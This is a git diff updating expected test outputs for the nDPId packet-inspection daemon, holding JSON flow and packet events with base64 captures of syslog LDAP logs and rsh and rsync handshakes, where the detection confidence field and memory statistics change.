00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":292,"pkt_l4_len":272,"thread_ts_msec":1464076252936,"pkt":"RQABJL4eQAA8Bq0urB9OgawdK8kjTwICdUbR1TedTUKAGABzPQsAAAEBCAoozL9YkELf7TwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0NTErMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNSQ0ggYmFzZT0ib3U9cGVvcGxlLGRjPWluLGRjPXBobSxkYz1lZHVjYXRpb24sZGM9Z291dixkYz1mciIgc2NvcGU9MiBkZXJlZj0wIGZpbHRlcj0iKCYodWlkPXRvb2xib3gpKG9iamVjdENsYXNzPXBvc2l4QWNjb3VudCkoJih1aWROdW1iZXI9KikoISh1aWROdW1iZXI9MCkpKSkiCg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1464076252936,"flow_last_seen":1464076252936,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1464076252936,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 01524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1464076252948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":844,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":844,"pkt_l4_len":824,"thread_ts_msec":1464076252948,"pkt":"RQADTL4fQAA8BqsFrB9OgawdK8kjTwICdUbSxTedTUKAGABzuVAAAAEBCAoozL9lkELg+DwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0NzUrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNSQ0ggYXR0cj1vYmplY3RDbGFzcyB1aWQgdXNlclBhc3N3b3JkIHVpZE51bWJlciBnaWROdW1iZXIgZ2Vjb3MgaG9tZURpcmVjdG9yeSBsb2dpblNoZWxsIGtyYlByaW5jaXBhbE5hbWUgY24gbW9kaWZ5VGltZXN0YW1wIG1vZGlmeVRpbWVzdGFtcCBzaGFkb3dMYXN0Q2hhbmdlIHNoYWRvd01pbiBzaGFkb3dNYXggc2hhZG93V2FybmluZyBzaGFkb3dJbmFjdGl2ZSBzaGFkb3dFeHBpcmUgc2hhZG93RmxhZyBrcmJMYXN0UHdkQ2hhbmdlIGtyYlBhc3N3b3JkRXhwaXJhdGlvbiBwd2RBdHRyaWJ1dGUgYXV0aG9yaXplZFNlcnZpY2UgYWNjb3VudEV4cGlyZXMgdXNlckFjY291bnRDb250cm9sIG5zQWNjb3VudExvY2sgaG9zdCBsb2dpbkRpc2FibGVkIGxvZ2luRXhwaXJhdGlvblRpbWUgbG9naW5BbGxvd2VkVGltZU1hcAo8MTY3PjIwMTYtMDUtMjRUMDk6NTA6NTIuOTI2NDgxKzAyOjAwIGxkYXAwMSBzbGFwZFszNDUzNF06IGNvbm49MTE1OTAyMyBvcD00NCBFTlRSWSBkbj0idWlkPXRvb2xib3gsb3U9YWMtYWl4LW1hcnNlaWxsZSxvdT1pbnRlcm5lLG91PXBlb3BsZSxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiCjwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45MjY0ODYrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ0IFNFQVJDSCBSRVNVTFQgdGFnPTEwMSBlcnI9MCBuZW50cmllcz0xIHRleHQ9Cg=="} 00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1464076252968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":303,"pkt_l4_len":283,"thread_ts_msec":1464076252968,"pkt":"RQABL74gQAA8Bq0hrB9OgawdK8kjTwICdUbV3TedTUKAGABzb+4AAAEBCAoozL94kELhBTwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45NTc4OTUrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ1IFNSQ0ggYmFzZT0ib3U9Z3JvdXBlcyxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiIHNjb3BlPTIgZGVyZWY9MCBmaWx0ZXI9IigmKG1lbWJlclVpZD10b29sYm94KShvYmplY3RDbGFzcz1wb3NpeEdyb3VwKShjbj0qKSgmKGdpZE51bWJlcj0qKSghKGdpZE51bWJlcj0wKSkpKSIK"} 00251{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":12,"packet_id":6,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","size":1010,"expected":1084,"global_ts_msec":1464076253006} 01637{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1010,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1010,"pkt_l4_len":0,"thread_ts_msec":1464076252992,"pkt":"RQAEPL4jQAA8BqoRrB9OgawdK8kjTwICdUbbRzedTUKAGABzdzIAAAEBCAoozL+dkELhMTwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45ODc5MjgrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ3IFNSQ0ggYmFzZT0ib3U9cGVvcGxlLGRjPWluLGRjPXBobSxkYz1lZHVjYXRpb24sZGM9Z291dixkYz1mciIgc2NvcGU9MiBkZXJlZj0wIGZpbHRlcj0iKCYodWlkPXRvb2xib3gpKG9iamVjdENsYXNzPXBvc2l4QWNjb3VudCkoJih1aWROdW1iZXI9KikoISh1aWROdW1iZXI9MCkpKSkiCjwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45ODc5NDMrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ3IFNSQ0ggYXR0cj1vYmplY3RDbGFzcyB1aWQgdXNlclBhc3N3b3JkIHVpZE51bWJlciBnaWROdW1iZXIgZ2Vjb3MgaG9tZURpcmVjdG9yeSBsb2dpblNoZWxsIGtyYlByaW5jaXBhbE5hbWUgY24gbW9kaWZ5VGltZXN0YW1wIG1vZGlmeVRpbWVzdGFtcCBzaGFkb3dMYXN0Q2hhbmdlIHNoYWRvd01pbiBzaGFkb3dNYXggc2hhZG93V2FybmluZyBzaGFkb3dJbmFjdGl2ZSBzaGFkb3dFeHBpcmUgc2hhZG93RmxhZyBrcmJMYXN0UHdkQ2hhbmdlIGtyYlBhc3N3b3JkRXhwaXJhdGlvbiBwd2RBdHRyaWJ1dGUgYXV0aG9yaXplZFNlcnZpY2UgYWNjb3VudEV4cGlyZXMgdXNlckFjY291bnRDb250cm9sIG5zQWNjb3VudExvY2sgaG9zdCBsb2dpbkRpc2FibGVkIGxvZ2luRXhwaXJhdGlvblRpbWUgbG9naW5BbGxvd2VkVGltZU1hcAo8MTY3PjIwMTYtMDUtMjRUMDk6NTA6NTIuOTg3OTQ5KzAyOjAwIGxkYXAwMSBzbGFwZFszNDUzNF06IGNvbm49MTE1OTAyMyBvcD00NyBFTlRSWSBkbj0idWlkPXRvb2xib3gsb3U9YWMtYWl4LW1hcnNlaWxsZSxvdT1pbnRlcm5lLG91PXBlb3BsZSxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiCjwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45ODc5NTMrMDI6MDAgbGRhcDAxIHNsYXA="} 00251{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":12,"packet_id":7,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","size":1010,"expected":1400,"global_ts_msec":1464076253008} 01637{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1010,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1010,"pkt_l4_len":0,"thread_ts_msec":1464076253006,"pkt":"RQAFeL4kQAA8BqjUrB9OgawdK8kjTwICdUbfTzedTUKAEABzI2UAAAEBCAoozL+fkELhMTwxNjc+MjAxNi0wNS0yNFQwOTo1MDo1Mi45OTYwNzYrMDI6MDAgbGRhcDAxIHNsYXBkWzM0NTM0XTogY29ubj0xMTU5MDIzIG9wPTQ4IFNSQ0ggYmFzZT0ib3U9Z3JvdXBlcyxkYz1pbixkYz1waG0sZGM9ZWR1Y2F0aW9uLGRjPWdvdXYsZGM9ZnIiIHNjb3BlPTIgZGVyZWY9MCBmaWx0ZXI9IigmKG1lbWJlclVpZD10b29sYm94KShvYmplY3RDbGFzcz1wb3NpeEdyb3VwKShjbj0qKSgmKGdpZE51bWJlcj0qKSghKGdpZE51bWJlcj0wKSkpKSIKPDE2Nz4yMDE2LTA1LTI0VDA5OjUwOjUyLjk5NjA5MSswMjowMCBsZGFwMDEgc2xhcGRbMzQ1MzRdOiBjb25uPTExNTkwMjMgb3A9NDggU1JDSCBhdHRyPW9iamVjdENsYXNzIGNuIHVzZXJQYXNzd29yZCBnaWROdW1iZXIgbW9kaWZ5VGltZXN0YW1wIG1vZGlmeVRpbWVzdGFtcAo8MTY3PjIwMTYtMDUtMjRUMDk6NTA6NTIuOTk2MDk2KzAyOjAwIGxkYXAwMSBzbGFwZFszNDUzNF06IGNvbm49MTE1OTAyMyBvcD00OCBFTlRSWSBkbj0iY249aW50c2lyLWFkbWlucyxvdT1ncm91cGVzLGRjPWluLGRjPXBobSxkYz1lZHVjYXRpb24sZGM9Z291dixkYz1mciIKPDE2Nz4yMDE2LTA1LTI0VDA5OjUwOjUyLjk5NjEwMSswMjowMCBsZGFwMDEgc2xhcGRbMzQ1MzRdOiBjb25uPTExNTkwMjMgb3A9NDggU0VBUkNIIFJFU1VMVCB0YWc9MTAxIGVycj0wIG5lbnRyaWVzPTEgdGV4dD0KPDE2Nz4yMDE2LTA1LTI0VDA5OjUwOjUyLjk5NzMzMCswMjowMCBsZGFwMDEgc2xhcGRbMzQ1MzRdOiBjb25uPTExNTkwMjMgb3A9NDkgU1JDSCBiYXNlPSJvdT1ncm91cGVzLGRjPWluLGRjPXBobSxkYz1lZHVjYXRpb24sZGM9Z291dixkYz1mciIgc2NvcGU9MiBkZXJlZj0wIGZpbHRlcj0iKCYoZ2lkTnVtYmVyPTYwMDAxKShvYmplY3RDbGFzcz1wb3NpeEdyb3VwKShjbj0qKSgmKGdpZE51bWJlcj0qKSghKGdpZE51bWJlcj0wKSkpKSIKPDE2Nz4yMDE2LTA1LTI0VDA5OjU="} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1464076252936,"flow_last_seen":1464076253018,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":958,"flow_tot_l4_payload_len":4939,"flow_avg_l4_payload_len":617,"midstream":1,"thread_ts_msec":1464076253018,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1464076252936,"flow_last_seen":1464076253018,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":958,"flow_tot_l4_payload_len":4939,"flow_avg_l4_payload_len":617,"midstream":1,"thread_ts_msec":1464076253018,"l3_proto":"ip4","src_ip":"172.31.78.129","dst_ip":"172.29.43.201","src_port":9039,"dst_port":514,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8,"source":"rsh-syslog-false-positive.pcap","alias":"nDPId-test","packets-captured":8,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":4939,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1464076253018} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8/8 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869675 bytes -~~ total memory freed........: 5869675 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003309 bytes +~~ total memory freed........: 6003309 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 256 chars ~~ json string max len.......: 1642 chars diff --git a/test/results/rsh.pcap.out b/test/results/rsh.pcap.out index 326b05417..146400b39 100644 --- a/test/results/rsh.pcap.out +++ b/test/results/rsh.pcap.out @@ -4,14 +4,14 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA8BJ9AAEAGOBt\/AAABfwAAAQP\/AgJQUgi+AAAAAKAC\/9f+MAAAAgT\/1wQCCAp\/2NwKAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQICA\/+d65A3UFIIv6AS\/8v+MAAAAgT\/1wQCCAp\/2NwKf9jcCgEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1654277359673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1654277359673,"pkt":"AAAAAAAAAAAAAAAACABFAAA0BKBAAEAGOCJ\/AAABfwAAAQP\/AgJQUgi\/neuQOIAQAgD+KAAAAQEICn\/Y3Ap\/2NwK"} -00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277359673,"flow_last_seen":1654277359689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277359689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277359673,"flow_last_seen":1654277359689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277359689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654277362292,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1654277362292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA89+tAAEAGRM5\/AAABfwAAAQP9AgKmCPcIAAAAAKAC\/9f+MAAAAgT\/1wQCCAp\/2OZEAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQICA\/0MeFXipgj3CaAS\/8v+MAAAAgT\/1wQCCAp\/2OZEf9jmRAEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1654277362292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1654277362292,"pkt":"AAAAAAAAAAAAAAAACABFAAA09+xAAEAGRNV\/AAABfwAAAQP9AgKmCPcJDHhV44AQAgD+KAAAAQEICn\/Y5kR\/2OZE"} -00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277362292,"flow_last_seen":1654277362309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1654277362309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} -00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277362292,"flow_last_seen":1654277363725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} -00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277359673,"flow_last_seen":1654277360987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277362292,"flow_last_seen":1654277362309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1654277362309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277362292,"flow_last_seen":1654277363725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277359673,"flow_last_seen":1654277360987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1654277363725} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875381 bytes -~~ total memory freed........: 5875381 bytes -~~ total allocations/frees...: 118146/118146 +~~ total memory allocated....: 6009015 bytes +~~ total memory freed........: 6009015 bytes +~~ total allocations/frees...: 120908/120908 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 788 chars diff --git a/test/results/rsync.pcap.out b/test/results/rsync.pcap.out index fce83f4a3..38b34a082 100644 --- a/test/results/rsync.pcap.out +++ b/test/results/rsync.pcap.out @@ -4,8 +4,8 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} 